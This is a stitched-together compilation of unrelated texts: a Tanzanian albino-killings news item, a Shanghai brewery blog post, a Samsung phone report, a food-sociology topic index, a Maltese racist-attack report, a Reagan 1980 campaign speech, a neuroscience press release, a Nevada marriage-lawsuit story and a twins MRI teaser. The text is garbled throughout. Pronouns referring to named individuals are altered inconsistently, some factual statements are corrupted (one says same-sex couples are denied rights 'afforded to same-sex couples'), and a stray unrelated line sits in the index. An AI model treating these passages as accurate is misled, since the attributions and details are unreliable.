Tanzania's President Jakaya Kikwete, the newly elected chairperson of the African Union, speaks to the media at the main conference hall of the 10th African Union in Ethiopia's capital Addis Ababa January 31, 2008. REUTERS/Antony Njuguna
They said 19 albinos had been murdered since March 2007, and another two were missing presumed dead in the east African country.
“Sometimes, word spreads around that body parts of people with certain physical attributes like bald people or albinos contribute greatly to attaining quick prosperity,” Kikwete said in a monthly state of the nation speech late on Wednesday.
“These killings are shameful and distressing to our society,” they added.
Albinos are often accused in Tanzania of being witches themselves.
There are an estimated 270,000 people who suffer from the condition which stops them producing pigment in their skin, hair and eyes in the country of 39 million.
Kikwete blamed charlatan witchdoctors, many masquerading as traditional healers, for extracting body parts such as genitals, tongues and breasts.
“Many of the witchcraft killings happen because of a false belief that by using other peoples' body parts they can succeed in business or in activities like mining or fishing,” Kikwete said.
Most killings took place in the Victoria region and were committed by gangs for hire, they said.
(Reporting by George Obulutsa; Editing by Giles Elgood)
Boxing Cat Brewery: The Challenges & Rewards of Craft Beer in Shanghai, China
Article by Liz, photos by Dave Jensen
Dave Jensen (beer47) Blocked Unblock Follow Mar 10, 2011
To chime in the New Year, we visited Shanghai, China and received a personal tour of Boxing Cat Brewery by the head brewer, Michael Jordan. While sampling some beer right from the fermenters, we learned insights about creating and offering an American craft product in China as well as the challenges of doing business as a foreigner in China.
Shanghai is a non-stop city where East and West are colliding and break-neck speed and there is abundance of business opportunities. My first trip to this dazzling city was in May 2010 with my business school program through Duke's Cross-Continent MBA Program. I teamed up with some fellow beer geeks/classmates on a quest for good beer. We hit Kaiba on Kangding Road — a laid back, fully-stocked beer bar where I got to try Brooklyn Beer for the first time — and the Bund Brewery — a standard and uninspiring brew pub that serves a dark, lager, and a wheat. Boxing Cat Brewery in the French Concession was the last place on our list. It was near frog design, where I had organized a small corporate tour on a chance meeting at Tony the Tailor with a project lead. Unfortunately, we arrived at Boxing Cat at 3:30pm to learn that they were not open for another 90 minutes. With so much to do and see in Shanghai, we never made it back to Boxing Cat that week.
To celebrate graduation, I decided to ring in New Year's 2011 in Shanghai with David. David reached out to Boxing Cat and we were excited to receive a reply from the new head brewer, Michael Jordan, who was willing to give us a tour of the brewing facilities and the new restaurant.
The brewing facilities are about a 30 minute cab ride outside of Shanghai. We left the city's bustle and found ourselves in the “suburbs” with chickens on the side of the unpaved roads that reminded me that we were in mainland China. However, as we stepped into the sterile brewing facilities with the familiar malty aroma, we again forgot that we were in a factory in mainland China.
The brewing facilities are a 10 barrel system, which currently produces 1200 barrels per year. This was sufficient to supply the initial restaurant in the French Concession, however there are big plans brewing for Boxing Cat beer. In addition to the second restaurant, which was opened in October 2010, they plan to build a new larger brewery as a production brewery for distribution. However, they need to go through the local government procedures which don't seem intuitive: first the business applies for the building license, then the government lets the business start construction, finally, the inspections occur for the construction. The whole process is expected to take 6–12 months.
Michael has a fascinating background that demonstrates that beer can take you to some amazing and unexpected places around the world. Originally from Portland, OR, Michael moved to Denmark to work at Bryggeriet S.C. Fuglsang (founded in 1865, producing 25565 barrels per year on an 230 barrel system in addition to 2 malting factories that produces about 160,000 tons of malt per year). After 2 years with Fuglsang, Michael sought a change, but an opportunity in China was not what they imagined. They connected with the Boxing Cat founders, Kelley Lee and Lee Tseng, via BrewingWork.com, an online beer industry forum. Lee and Tseng were trying to take their time time in finding a right headbrewer after the sudden and untimely death of their original brewer. The timing was clearly right as the addition of Michael allowed Boxing Cat to stay on track with the opening of their second restaurant in Sinan Mansions on Fu Xing Road without compromising quality.
Michael had only been in China for 2.5 months when we met him. Their stories about producing a foreign product in China were similiar — though always compelling — to the problems I learned from guest speakers from major global corporations in business school: opportunities are abundant in China; it's difficult to source quality materials locally; it's difficult to import quality materials because of strict, yet ambiguous regulations. There is no Chinese brewer's association yet, but there are 6–7 breweries in Shanghai to help with sourcing materials. For Michael, every step is a challenging new discovery. They currently source their grains from China but is working on a new source from Germany, from which shipping is expensive and the turnaround time is 2 months. Michael needs to order a 6 months supply each time in order to keep the grains fresh. They can order some grains from a domestic company in Jinan, but the quality is not as good.
As for other ingredients: water is double filtrated with added salts.  They are currently using German hops, although he's trying to get hop's through Yakima Chief's Hong Kong office. Yeast is an arduous challenge. It is currently being hand-carried from While Labs in Southern California. Chris White has visited with Michael and has indicated that they want to set up a company in China to manage yeast culturing in China. There is a huge opportunity to cultivate yeast for big and small brewers in China.
These operational challenges have not deterred Michael, who's making a quality American-style craft brew. In the brewery, we started our sampling with the Suckerpunch Pale Ale straight out of the fermentation tank. This is a refreshing ale made with Magnum bittering hops and then late hopped and dry-hopped with Citra. This ale would pair perfectly with both the American fare at the restaurant and the salty, savory local Shanghainese food (like xiao long bao and shen jian bao from Yang's Fried Dumplings). Next, we tried the Imperial Red Ale. Even from cold-conditioning tank, this had a beautiful, clear amber color and imparted citrus flavors with a dry finish. It reminded me alot of Deschutes Red Chair Northwest Pale Ale. Finally, we sampled the Brown Ale. This was a smooth malty, toasty brown with low bitterness, which I could enjoy drinking on its own or with the meatloaf or beef stew that I had already scoped out on the restaurant's online menu the night before.
So who is Michael brewing for? My visits to Shanghai have demonstrated a wide-spread ex-pat community. This means that there are a variety of tastes to try to satisfy. With the new Sinan Mansions location, Michael said that there is plenty of traffic from both the ex-pat and local Chinese community. They were surprised that there is a universal appeal for IPA's. According to Michael, their customers are looking for decent flavor. Craft beer has spread throughout the world and the US is leading the world with its creativity and diversity in craft beer.
After our tour and sampling, we (luckily) hailed a cab from a back country road and returned to Shanghai to see the Boxing Cat restaurant, a comfortably modern restaurant in the newly developed Sinan Mansions. I started with the TKO IPA, which was made with Simcoe and Cascade hops. This ale thoroughly quenched the spicy boldness from the Cali-Cajun Chicken Club that I had as my entree. We also shared an order of BBQ Pulled Pork Quesadillas and Full Monty Nachos. These dishes captured American comfort food. If I were an ex-pat in Shanghai, I would be some spending time at Boxing Cat to get a taste of home.
Although I can't compare the original Boxing Cat microbrews to it's current iteration, Michael has set a solid foundation for the future of Boxing Cat. Once they get more settled in China and gets their rhythm in Shanghai, I look forward to seeing them expanding their creativity that the craft brew space allows. They can put Shanghai and China on the craft beer world map.
A couple of weeks ago we reported on tests conducted by Consumer Reports on the Galaxy S7 Active's waterproofing claims. Samsung says that the Galaxy S7 Active can survive in up to five feet of water for up to 30 minutes. Two Galaxy S7 Active units went through a similar test and both of them failed. A few days later Samsung issued an official statement on the matter and said that it “stands behind” the waterproofing certification.
CNET conducted a couple of tests on its own a few days ago and found that the Galaxy S7 Active wasn't as waterproof as Samsung as claiming it to be. The company has followed up with another statement saying that it has discovered an issue to a production line that exclusively manufactures the Galaxy S7 Active. It says that the issue has been resolved and that it has received “very few customer inquiries.” Those who own a Galaxy S7 Active with water damage can claim a replacement from Samsung under its standard limited warranty.
Sociology of food is the study of food as it relates to the history, progression, and future development of society. This includes production, distribution, conflict, medical application, ritual, spiritual, and cultural applications, environmental and labor issues.
5 A Day - acceptable daily intake - aggregate nutrient density index - ageusia - animal source foods - additives - aeroponics - agriculture - alcohol - alcoholic beverage control state - algaculture - Androphagi - antibiotic - antioxidant - appellation - Appellation d'origine contrôlée - apiculture - aphagia - appetite - aquaculture - asado
B [ edit ]
baker's dozen - baking - Banchan - barbecue - barbecue in the United States - beer - beer style - benzopyrene - berenklauw - beverage-can stove - biodiversity - blind-baking - birthday cake - bottom trawling - bottom's up - bottled water - braai - breadbox - broasting - broiling - bulgogi - bread - bushfood - bushmeat - bycatch
C [ edit ]
canning - cannibalism - carbohydrate - carry over cooking - cart noodle - catch and release - casu marzu - cereal - cha chaan teng - charbroil - Churchkhela - comfort food - Common Agricultural Policy - Common Fisheries Policy - control of fire by early humans - conveyor belt sushi - convenience food - cooking - cookware and bakeware - cretan diet - curing — culinary — curry
D [ edit ]
dai pai dong - deep frying - Denominazione di origine controllata - diabetes - diet - dietary supplement - dieting - digestion - dim sum - distilled beverage - drying - dysgeusia
E [ edit ]
eating — eating disorders — enzyme — entomophagy — environmental vegetarianism — essential nutrient — ethics — exercise
F [ edit ]
- factory ship - famine - FARMA - farmers' market - fast food - fasting - fat - fat acceptance movement - fiber - finger bowl - fishing - food allergy - food bank - food chain - food consumption by class - food consumption by gender - food consumption by race - food consumption by socioeconomic status - food contaminants - food energy - Food for Peace - food fortification - food guide pyramid - food irradiation - food labeling regulations (U.K., E.U.) - food microbiology - food policy - food porn - food price crisis - food processing - food safety - food security - food sovereignty - food vs fuel - FreeRice - Free The Hops - fresherized - from scratch - fruitarianism - functional food
G [ edit ]
galbi — game — Game & Wildlife Conservation Trust — Gas Mark — gastronomy — geographical indication — Geographical indications and traditional specialities (EU) — geoponic — glycemic index - Gourmet Museum and Library — Green Revolution — grilling
H [ edit ]
healthy eating pyramid — health claims on food labels — Hechsher Tzedek — high altitude cooking — High-Level Conference on World Food Security - home canning — hot salt frying — hot sand frying — hunger — hunter-gatherer — hunting — hydroponics
I [ edit ]
ikizukuri — inedia — indigenous Australian food groups — International English food terms
J [ edit ]
Jamaican jerk spice
K [ edit ]
Kansas City-style barbecue — ketogenic diet — kitchen stove — Korean barbecue
L [ edit ]
leftovers — liqueur — local food — lou mei
M [ edit ]
main course — mariculture — marination — Marine Protected Area — mastication — maximum sustainable yield — meal — meat analogue -(metabolic foods) — mushroom hunting — mineral — MyPyramid
N [ edit ]
Nasi liwet — nutraceutical — nutrition — Nyotaimori
O [ edit ]
obesity — Odori ebi — oenology — oenophilia - Okazu - Opson - Opsophagos — OREC — overfishing
P [ edit ]
parbaking — pasteurization — persistence hunting — pescetarianism — placentophagy — preservation — pickling — pink slime — portable stove — prebiotic — preservatives — pressure cooking — pressure frying — probiotic — protein
Q [ edit ]
Quality Wines Produced in Specified Regions
R [ edit ]
rocket stove—rotisserie—root vegetable
S [ edit ]
sannakji—sashimi—sautéing—savoury (small dish)—seasoning—shark finning—siu mei—Slow Food—soup—soy—starvation—surimi—sushi—sustainability—sustainable food system
T [ edit ]
taste — tea culture — teppanyaki — teriyaki — terroir — trans fat — trophic dynamics — tropical agriculture — tureen
U [ edit ]
umami — underweight — unsaturated fat — urban agriculture — USDA National Nutrient Database
V [ edit ]
veganism — vegetarianism — vertical farming — vitamin — vitamin C megadosage — viticulture
W [ edit ]
water — wedding cake — weight cutting — weight loss — whole grain stamp — wildlife — wine — world food day — world food prize — world food programme
X [ edit ]
xanthan gum
Y [ edit ]
yakiniku — yakisoba — yakitori — ye wei — yum cha — yo-yo effect
Z [ edit ]
Food History [ edit ]
Wine History [ edit ]
Alban wine—Ancient Greece and wine—Ancient Rome and wine—Ancient Rome and wine—Caecuban wine—Chian wine—Coan wine—Conditum Paradoxum—Cretan wine—Falernian wine—Great French Wine Blight
Fumarium—History of wine—History of American wine—History of Bordeaux wine—History of California wine—History of French wine—History of Oregon wine production—History of Rioja wine
Hypocras—Lesbian wine—Marriage at Cana—Passum—Persian wine—Police des Vins—Retsina—Shedeh—Shirazi wine—Vino Greco
Food-Related Lists [ edit ]
List of basic cooking topics—List of food companies
Additive/Preservative Lists [ edit ]
Foods containing tyramine—List of food additives—List of food additives, Codex Alimentarius—List of unrefined sweeteners
my friend loves denver
Cultivar Lists [ edit ]
apple—basil—capsicum—mango—pear—strawberry
Edible Lists [ edit ]
Food [ edit ]
Culinary Fruits—Vegetables—Culinary Herbs and Spices—Grape Varieties
Culinary Nuts—Edible Seeds—Edible Flowers—Edible Leaves
List of soups—List of raw fish dishes—List of sushi and sashimi ingredients
Cheese [ edit ]
Main list
American cheese — British cheese — Dutch cheese — French cheese — Italian cheese — Irish cheese — Cheeses of Switzerland
Greek PDO cheeses — Italian PDO cheese
Beverages [ edit ]
Glossary of wine terms—List of alcoholic beverages—List of liqueurs—List of non-alcoholic cocktails—List of soft drinks by country
List of Appellation d'Origine Contrôlée liqueurs and spirits—List of Appellation d'Origine Contrôlée wines
List of Italian DOC wines—List of Italian DOCG wines—List of Italian IGT wines
List of beer styles—List of commercial brands of beer
Miscellaneous Lists [ edit ]
List of co-operative federations—List of cuisines—List of diets—List of famines
List of food preparation utensils—List of Japanese cooking utensils
List of geographical designations for spirit drinks in the European Union
See also [ edit ]
Foodborne Illness Outbreaks [ edit ]
Canada—United States
Environmental [ edit ]
Fishing—Meat Production—Pesticides
Measurements [ edit ]
Cooking weights and measures—Gastronorm sizes—Zadoks scale
Miscellaneous [ edit ]
Alcohol laws of the United States by state
Fisheries glossary
"The Big Eight" food Allergies
Glossary of terms associated with diabetes
List of countries by alcohol consumption
Population dynamics of fisheries
Taboo food and drink
Further reading [ edit ]
Beardsworth, Alan. (1997)' Sociology on the Menu: An Invitation to the Study of Food and Society, Routledge, ISBN 0-415-11424-1
Counihan, Carole. (2007). Food And Culture: A Reader, Routledge ISBN 0-415-97777-0
Germov, John. (2004). A Sociology of Food & Nutrition: The Social Appetite, Oxford University Press, ISBN 0-19-551625-7
Kingsolver, Barbara. (2007). Animal, Vegetable, Miracle: A Year of Food Life, Harpercollins, ISBN 0-06-085255-0
Levenstein, Harvey. (1988). Revolution at the Table: The Transformation of the American Diet, Oxford University Press, ISBN 0-19-504365-0
Nestle, Marion. (2003). Food Politics: How the Food Industry Influences Nutrition and Health-- Marion Nestle, Ph.D., M.P.H. , Univ of California Press, ISBN 0-520-24067-7
Mennell, Stephen. (1993). The Sociology of Food: Eating, Diet and Culture, Sage Publications, ISBN 0-8039-8839-7
Ritzer, George. (2007). The McDonaldization of Society, Sage Publications, ISBN 978-1-4129-5429-7
Schlosser, Eric. (2001). Fast Food Nation: The Dark Side of the All American Meal, HarperCollins ISBN 0-395-97789-4
Smith, Alisa. & MacKinnon, J.B. (2007). The 100-Mile Diet, Random House Canada ISBN 0-679-31482-2
Watson, James, L. (2005). The Cultural Politics of Food and Eating, Blackwell Publishing ISBN 0-631-23092-0
Professional associations [ edit ]
American Association of Cereal Chemists
American Dietetic Association
America's Second Harvest
Food and Agriculture Organization - (United Nations)
International Food Policy Research Institute
International Fund for Agricultural Development
You need Javascript and either Adobe Flash or Html5 to view this video.
A Hungarian student who was trying to put some order in a chaotic queue of about 200 people waiting to register and top up their tallinja card at the Valletta terminus, ended up the victim of a racist attack.
Daboma Jack, a chemical engineer from Hungary, in Malta for a year to study their masters degree joined the queue at the bus terminus at about 10am, together with their wife.
After about an hour, with no sign of the queue budging, they took the initiative to convince people to queue in a single file. Most of the frustrated crowd cooperated with them and attempted a semblance of order.
Witnesses told Times of Malta, however, that at about 11.30am, a Maltese woman in the queue went up to Mr Jack and started shouting in their face: “Go back to your country! Go back to your country!” They then spat in their face twice.
Them comments are believed to have been motivated by the fact that Mr Jack is black.
Taken aback, Mr Jack immediately reported the incident to the police, who however, failed to do anything.
The woman approached Mr Jack and slapped them in their face. At this point Mr Jack started shouting and called at the police to take action as this was a racist attack.
The police came and immediately pinned them down and handcuffed him. Meanwhile the woman, ran away.
Eyewitnesses immediately informed the police that Mr Jack was innocent and that they were not the one who initiated the disorder.
After the police took their details, a visibly shaken Mr Jack , said: “In no other country would someone have spat on a black man and the police do nothing.”
Their wife, Kelly, who witnessed the whole scene, including the woman's cries for them to go back home, told Times of Malta: “Go back where? We are EU citizens!”
“This is human rights we are talking about. The slap was not for my husband but for every other black person in the crowd," they said.
In a statement this afternoon, the Home Affairs Ministers said they instructed the Police Commissioner to launch an internal investigation into the matter with immediate effect.
Later, the police said an investigation was initiated by the Internal Affairs Unit to establish the facts leading to the incident.
In a statement, the Nationalist Party condemned the attack and said it would never allow discrimination or violence because of one's race or skin colour.
It encouraged the Police Commissioner to conclude the investigation as soon as possible for the truth to come out and for procedures to be taken against those guilt of a racist attack.
Non-governmental organisation Aditus posted a letter addressed to the police on its facebook site, which it is encouraging the public to copy and send, calling for the matter to be given its due attention and looking forward to progress updates.
Alternattiva Demokratika said the incident was cause of serious concern for the majority of Maltese peace loving and democratic people.
"There is no place for police officers who arrest people on the basis of their skin colour. We look forward to justice being meted out as soon as possible," it said.
Audio AR-XE mp3 of Address
Plug-in required for flash audio
Your browser does not support the audio element.
[AUTHENTICITY CERTIFIED: Text version below transcribed directly from audio]
I've been asked by some of my friends in the press why we picked Hudson County for this kind of kick off of the campaign. Now I'm sure they asked because Hudson County is the home of Democrats in such great numbers…. No -- No and I hope a lot are here. As a matter of fact, I'm the first Republican candidate to come here since 1968.
But the answer to their question is, I'm here because it is the home of Democrats, because I believe today, that in this country there are millions of Democrats who are just as unhappy with the way things are as all the rest of us are.
It's fitting that on Labor Day, we meet beside the harbors, the waters I should say of New York harbor, with the eyes of Miss Liberty on our gathering and in the words of the poet whose lines are inscribed at their feet, "On the air bridged harbor that twin cities frame."
Through this "Golden Door," under the gaze of that "Mother of Exiles," has come millions of men and women, who first set foot on American soil right there, on Ellis Island, so close to the Statue of Liberty.
These families came here to work. They came to build. Others came to America in different ways, from other lands, under different, and often harrowing conditions. But this place symbolizes what they all managed to build, no matter where they came from or how they came or how much they suffered.
They helped to build that magnificent city across the river. They spread across the land building other cities and other towns and incredibly productive farms.
They came to make America work. They didn't ask what this country could do for them but what they could do to make this -- this refuge the greatest home of freedom in history.
They brought with them courage, ambition and the values of family, neighborhood, work, peace, and freedom. We all came from different lands but we share the same values, the same dream.
Today a President of the United States would have us believe that dream is over or at least in need of change. Jimmy Carter's Administration tells us that the descendants of those who sacrificed to start again in this land of freedom may have to abandon the dream that drew their ancestors to a new life in a new land.
You're right. The Carter record is a litany of despair, of broken promises, of sacred trusts abandoned and forgotten. Eight million -- eight million out of work. Inflation running at 18 percent in the first quarter of this year. Black unemployment at 14 percent, higher than any single year since the government began keeping separate statistics. Four straight major deficits run up by Carter and their friends in Congress. The highest interest rates since the Civil War, reaching at times close to 20 percent, lately they're down to more than 11 percent but now they've begun to go up again. Productivity falling for six straight quarters among the most productive people in the world.
Through their inflation they have raised taxes on the American people by 30 percent, while their real income has risen only 20 percent. The Lady standing there in the harbor has never betrayed us once. But this Administration in Washington has betrayed the working men and women of this country.
The President promised that they would not increase taxes for the low and middle-income people, the workers of America. Then they imposed on American families the largest single tax increase in our nation's history. Their answer to all this misery? They try to tell us that we're “only” in a recession, not a depression, as if definitions, words, relieve our suffering.
Let it show on the record that when the American people cried out for economic help, Jimmy Carter took refuge behind a dictionary. Well if it's a definition -- if it's a definition they want, I'll give them one. A recession is when your neighbor loses their job. A depression is when you lose yours. And recovery is when Jimmy Carter loses his.
[Crowd chants.]
Thank you. Thank you. Well, all right, thank you. Maybe I should quit right now, but I'll go on for a few more minutes.
I have talked with unemployed workers all across this country. I've heard their views on what Jimmy Carter has done to them and their families. They aren't interested in semantic quibbles. They're out of work and they know who put them out of work. And they know the difference between a recession and a depression.
Let Mr. Carter go to their homes, look their children in the eye and argue with them that it's “only” a recession that put Dad or Mom out of work. Let them go to the unemployment lines and lecture those workers who have been betrayed on what is the proper definition for their widespread economic misery. Human tragedy, human misery, the crushing of the human spirit; they do not need defining, they need action. And it's action, in the form of jobs, to lower taxes, and an expanded economy that as President, I intend to provide.
Now, call this human tragedy whatever you want. Whatever it is, it's Jimmy Carter's. They caused it. They tolerate it. And he's going to answer to the American people for it.
Last week -- Last week more than three years after be become President, they finally came up with what they call a new economic program. It is their fifth new economic program in three and a half years. And you know listening to him, they talk as if someone else has been in charge for these last three and a half years. Now with two months to go until the election they ride to the rescue with a crazy-quilt of obvious election year promises which he'll ask Congress for next year. After three years of neglect, the misery of unemployment, inflation, high taxes, dwindling earning power and inability to save, after all this, American workers have now been discovered by the Administration.
Well it won't work. It's cynical. It's political. And it's too late. The damage is done and every American family knows who did it.
In 1976 they said they would never use unemployment as an economic tool to fight inflation. In 1980, this year, he's called for an increase in unemployment to fight inflation. In 1976 they said four years ago that they would bring unemployment and inflation both down to three percent. Well, who can believe him? Unemployment is now around eight percent, inflation is twelve and a half percent. And most of us have begun to realize that so long as Carter policies are in effect, the next four years are going to be just as bad as the last four have been.
But here, beside that torch that many times before in our nation's history has cast a golden light in times of gloom, I pledge to you I'll bring new hope to America.
[Chanting from crowd]
Thank you. I'm… well, you know, thanks. I'm -- I'm looking forward to meeting Mr. Carter in debate, confronting them with the whole sorry record of their Administration. The record they prefer not to mention. If they ever finally agrees to the kind of first debate the American people want, which I'm beginning to doubt, he'll answer to them and to me.
This country needs a new Administration, with a renewed dedication to the dream of an America, an Administration that will give that dream new life and make America great again! Restoring and revitalizing that dream will take bold action.
On this day, dedicated to American working men and women, may I tell you the vision that I have of a new Administration and of a new Congress, filled with new members dedicated to the values that we honor today?
Beginning in January of 1981, American workers will once again be heeded. Their needs and values will be acted upon in Washington. I will consult with representatives of organized labor on those matters concerning the welfare of working people of this nation.
I happen to be the only president of a union ever to be a candidate for President of the United States. As president -- as president of my union, the Screen Actors Guild, I spent many hours with the late George Meany, whose love of this country and whose belief in a strong defense against all totalitarians is one of labor's greatest legacies. One year ago today on Labor Day George Meany told the American people, "As American workers and their families return from their summer vacations, they face growing unemployment and inflation, a climate of economic anxiety and uncertainty.” One year ago, George Meany predicted just exactly what has happened to us.
Well I pledge to you in their memory, that the voice of the American worker will once again be heard and heeded in Washington and that the climate of fear that they spoke of will no longer threaten workers and their families.
When -- When we talk about tax reduction, when we talk about ending inflation by stopping it where it starts, in Washington, we're talking about a way to bring labor and management together for America. We're talking about jobs and productivity and wages. We're talking about doing away with Jimmy Carter's view of a no-growth policy, and ever-shrinking economic pie which means smaller slices for everyone of us.
That's no answer. We can have a bigger pie and that'll mean bigger slices for everyone of us. And I believe that together -- together you and I can bake that bigger pie. We can make that dream that brought so many of us or our parents and grandparents to this land, we can make that dream live once more. Let us work to protect the human right to acquire and own a home, make sure that right is extended to as many Americans as possible. A home is part of the dream.
I'm going to work in Washington to roll back the crushing burden of taxation that limits investment, production, and the generation of real wealth for our people. A job and savings and hope for our children is part of that dream. I want to help Americans of every race, creed, and heritage keep and build that sense of community which is at the heart of America, for a decent neighborhood is part of that dream.
We'll work -- We'll work to strengthen the small business sector which creates most of the new jobs we need for our people. Small business, the shopkeeper, needs relief from government paperwork, relief from over-regulation, relief from a host of governmentally created problems that defeat the effort of creative men and women. A chance to invest, build, and produce new wealth is part of that dream.
But restoring the American dream requires more than restoring a sound, productive economy, vitally important as that is. It requires a return to spiritual and moral values. Values so deeply held by those who came here to build a new life. We need to restore those values in our daily life, in our neighborhoods, and in our government's dealings with other nations of the world.
These are the values inspiring those brave workers in Poland. The values that have inspired other dissidents under Communist domination who have been willing to go into the Gulag and suffer the torture of imprisonment because of their dissidence. They remind us that where free unions and collective bargaining are forbidden, freedom is lost. They remind us that freedom is never more than one generation away from extinction. You and I must protect and preserve freedom here or it will not be passed on to our children and it would disappear everywhere in the world. Today the workers in Poland are showing a new generation how high is the price of freedom but also how much it is worth that price.
I want more than anything I've ever wanted, to have an Administration that will, through its actions, at home and in the international arena, let millions of people know that Miss Liberty still, “Lifts their lamp beside the golden door.” Through our international broadcasting stations, the Voice of America, Radio Free Europe, and the others; let us send, loud and clear, the message that this generation of Americans intends to keep that lamp shining. That this dream -- that this dream, this last best hope of man on earth, this nation under God, shall not perish from the earth. We will instead carry on the building of an American economy that once again holds forth real opportunity for all. We shall continue to be a symbol of freedom and guardian of the eternal values that so inspired those who came to this port of entry.
Let us pledge to each other, with this Great Lady looking on, that we can, and so help us God, we will make America great again.
Thank you very much.
Audio, Image (Screenshot) Source : The Ronald Reagan Presidential Library Audio Note : AR-XE = American Rhetoric Extreme Enhancement Page Updated : 10/15/17
BOSTON - The urge to satisfy hunger is a primal one, but - as any dieter knows - choices about when and what to eat can be influenced by cues in the environment, not just how long it's been since breakfast. The fact that food-associated visual cues in television commercials and on highway signs can contribute to overeating is well-documented. But how exactly do these external signals trigger cravings and influence behavior?
By developing a new approach to imaging and manipulating particular groups of neurons in the mouse brain, scientists at Beth Israel Deaconess Medical Center (BIDMC) have identified a pathway by which neurons that drive hunger influence distant neurons involved in the decision of whether or not to react to food-related cues. Their findings could open the door to targeted therapies that dampen food cue-evoked cravings in people with obesity. The research was published online today in the journal Nature.
"The main question we were asking is: how do evolutionarily ancient hunger-promoting neurons at the base of the brain, in the hypothalamus, influence 'cognitive' brain areas to help us find and eat calorie-rich foods in a complex and changing world?" said co-corresponding author Mark Andermann, PhD, an Assistant Professor of Medicine in the Division of Endocrinology, Diabetes and Metabolism at BIDMC and Assistant Professor at Harvard Medical School (HMS).
"To put it simply, when you're hungry, the picture of a cheeseburger may be extremely appealing and effective in influencing your behavior," explained lead author Yoav Livneh, PhD, postdoctoral fellow at BIDMC. "But if your belly is full after eating a big meal, the same cheeseburger picture will be unappealing. We think that the pathway we discovered from hunger-promoting neurons to a region of the brain called the insular cortex plays an important role here."
Brain imaging data in humans support the notion that the insular cortex is involved in deciding if a source of food is worth pursuing. In healthy humans, the insular cortex increases its activity in response to food cues during hunger but not following a meal. Studies suggest that this process often goes awry in patients with obesity or other eating disorders that exhibit excessive cravings. Those findings indicate that specific changes in brain activity, including increased sensitivity to food cues, may underlie these disorders - rather than a 'lack of willpower'.
In their study, Livneh, Andermann and co-corresponding author Bradford B. Lowell, MD, PhD, Professor of Medicine in the Division of Endocrinology, Diabetes and Metabolism at BIDMC and Professor of Medicine at HMS, and colleagues focused on the insular cortex, using a mouse model. Because the mouse insular cortex is located at the side of the brain in a hard-to-reach place, Andermann, Lowell, Livneh and colleagues pioneered the use of a tiny periscope that allowed them to see neurons in this previously unobservable part of the brain. The tool allowed the researchers to monitor and track individual neurons in awake mice as they responded to food cues in both sated and hungry physiological states.
Their experiments demonstrated that visual cues associated with food would specifically activate a certain group of neurons in the insular cortex of hungry mice, and that these neurons were necessary for mice to respond behaviorally to food cues. After mice had eaten until they were full, this brain response to food cues in the insular cortex was no longer present. While the mice were still sated, the researchers used genetic techniques to artificially create hunger by 'turning on' hunger-promoting neurons in the hypothalamus. These neurons express the gene for Agouti-related protein (AgRP) and were previously shown to restore simple feeding behaviors. By activating these AgRP neurons, Livneh and colleagues caused sated mice to once again react to visual stimuli and seek more food, and it also restored the pattern of food cue visual responses across neurons in insular cortex to that previously seen in hungry mice.
"These AgRP neurons cause hunger - they are the quintessential hunger neuron," explained Lowell. "It's a major advance to learn that we can artificially turn them on and cause full mice to work to get food and to eat as if they hadn't eaten in a long time. These neurons seem capable of causing a diverse set of behaviors associated with hunger and eating."
Based on their research, it may also be possible to dial down the specific pathway from AgRP neurons to the insular cortex and reduce over-attention to food cues in the environment, ideally without impacting deliberate eating at mealtimes. This hypothesis requires further investigation, the researchers stress, but has exciting implications for the treatment of human obesity and other eating disorders.
With their unprecedented view into the insular cortex, Andermann and Lowell's team created a road map of the brain circuitry by which hunger-related AgRP neurons ultimately influence insular cortex. Using powerful genetic and optical methods to switch individual cells on and off at will, the team could observe the effects both on downstream neurons and on behavior. The circuitry they revealed includes the amygdala, thought to update the value of food cues, and the paraventricular thalamus, which is also important for motivated behaviors. The researchers suggest the pathway may bias decision-making by increasing the pros and decreasing the cons of seeking out and eating a given food.
"We're still trying to understand how this process works," said Lowell. "Huge questions remain, but they are now addressable thanks to these new imaging methods."
###
For more information, watch this video about the work underway in Andermann's lab.
Co-investigators included Rohan N. Ramesh, Christian R. Burgess, Kirsten M. Levandowski, Joseph C. Madara, Henning Fenselau, Glenn J. Goldey, Veronica E. Diaz, Nick Jikomes, Jon M. Resch, all of BIDMC's Division of Endocrinology, Diabetes and Metabolism. Ramesh, Jikomes, Lowell and Andermann also hold appointments in the Program in Neuroscience at Harvard Medical School.
Support for this research was provided by a European Molecular Biology Organization postdoctoral fellowship; Edmond and Lily Safra Center for Brain Sciences postdoctoral award (Y.L.); Davis Family Foundation postdoctoral fellowship (C.R.B.); National Science Foundation Graduate Research Fellowship Program and the Sackler Scholars Program (N.J.); National Institutes of Health (NIH) National Institute of Diabetes and Digestive and Kidney Diseases (NIDDK) NRSA F31 DK105678 (R.N.R.); F32 DK103387 (J.M.R.); an NIH New Innovator Award DP2 DK105570 and R01 DK109930, the Klarman Family Foundation Grants Program in Eating Disorders Research, a McKnight Scholar Award, a Pew Scholar Award and a Smith Family Foundation Award (M.L.A.); NIH R01s DK075632, DK096010, DK089044, DK111401, and P30s DK046200 and DK057521 (B.B.L.).
About Beth Israel Deaconess Medical Center
Beth Israel Deaconess Medical Center is a patient care, teaching and research affiliate of Harvard Medical School and consistently ranks as a national leader among independent hospitals in National Institutes of Health funding.
Nevada Gov. Brian Sandoval has asked a federal court to dismiss a lawsuit challenging the state's ban on same-sex marriage, the Las Vegas Journal Review.
Sandoval noted that the U.S. Supreme Court had previously turned down same-sex couples' efforts to challenge state bans on same-sex marriage. In their 1971 ruling in Baker v. Nelson, the Supreme Court held that Minnesota's prohibition of same-sex marriage did not violate the U.S. Constitution.
“Based upon this precedent, there is no federal question presented in this case because the central question involved – the definition of marriage – is peculiarly and traditionally the right of states to define,” reads the response to the lawsuit, which was written by Wayne Howle, solicitor general in the state attorney general's office.
Eight same-sex couples filed a lawsuit against Nevada in April, alleging that the state's ban on same-sex marriage violated the Equal Protection Clause of the U.S. Constitution.
Nevada's Protection of Marriage amendment, approved by 67 percent of voters in 2002, states that marriage is only between one man and one woman. The state provides gay and lesbian couples with nearly all of the state law rights and responsibilities afforded to same-sex couples, but withholds the designation of marriage.
The lawsuit alleges that the marriage ban causes “serious and irreparable” harm to same-sex couples and their children because it treats them like “second-class citizens who are undeserving of the legal sanction, respect, and support that different-sex spouses and their families enjoy.”
The same-sex marriage ban violates the Equal Protection Clause of the Fourteenth Amendment because it discriminates on the basis of sexual orientation and sex, the lawsuit states.
What really goes on when twins share a womb? If this video is any indication, it could be a similar to what happens once they're young children -- they fight.
The amazing images of twins in utero come from a study aimed at using MRI machines to diagnose a potentially deadly condition called twin-to-twin transfusion syndrome, Reuters reports.
